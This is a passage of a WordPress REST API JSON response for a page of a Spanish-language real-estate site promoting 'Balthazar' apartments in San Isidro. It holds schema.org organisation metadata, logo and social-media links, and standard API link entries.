name=search_term_string"}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/tucaninversiones.com\/balthazar\/#organization","name":"Balthazar: Departamentos en San Isidro","url":"https:\/\/tucaninversiones.com\/balthazar\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/tucaninversiones.com\/balthazar\/#\/schema\/logo\/image\/","url":"https:\/\/tucaninversiones.com\/balthazar\/wp-content\/uploads\/2023\/02\/LOGO_TB-amarillo-pequeno-220x236-1.png","contentUrl":"https:\/\/tucaninversiones.com\/balthazar\/wp-content\/uploads\/2023\/02\/LOGO_TB-amarillo-pequeno-220x236-1.png","width":220,"height":236,"caption":"Balthazar: Departamentos en San Isidro"},"image":{"@id":"https:\/\/tucaninversiones.com\/balthazar\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/balthazar.sanisidro","https:\/\/www.instagram.com\/balthazar_sanisidro\/"]}]}},"_links":{"self":[{"href":"https:\/\/tucaninversiones.com\/balthazar\/wp-json\/wp\/v2\/pages\/3","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tucaninversiones.com\/balthazar\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tucaninversiones.com\/balthazar\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tucaninversiones.com\/balthazar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tucaninversiones.com\/balthazar\/wp-json\/wp\/v2\/comments?post=3"}],"version-history":[{"count":4,"href":"https:\/\/tucaninversiones.com\/balthazar\/wp-json\/wp\/v2\/pages\/3\/revisions"}],"predecessor-version":[{"id":162,"href":"https:\/\/tucaninversiones.com\/balthazar\/wp-json\/wp\/v2\/pages\/3\/revisions\/162"}],"wp:attachment":[{"href":"https:\/\/tucaninversiones.com\/balthazar\/wp-json\/wp\/v2\/media?parent=3"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}